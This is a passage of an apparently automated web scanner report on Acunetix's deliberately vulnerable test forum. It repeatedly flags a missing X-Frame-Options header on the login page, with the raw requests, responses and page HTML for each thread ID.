</tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D67 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D67 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=67 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:09 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D67" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D68 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D68 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=68 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:09 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D68" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D69 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D69 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=69 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:09 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D69" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 371 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=7 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:01 GMT Content-Length: 3133 |
Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D70 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D70 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=70 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:09 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D70" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D71 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D71 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=71 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:09 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D71" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D72 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D72 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=72 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:09 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D72" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D73 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D73 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=73 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:09 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D73" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D74 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D74 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=74 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:09 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
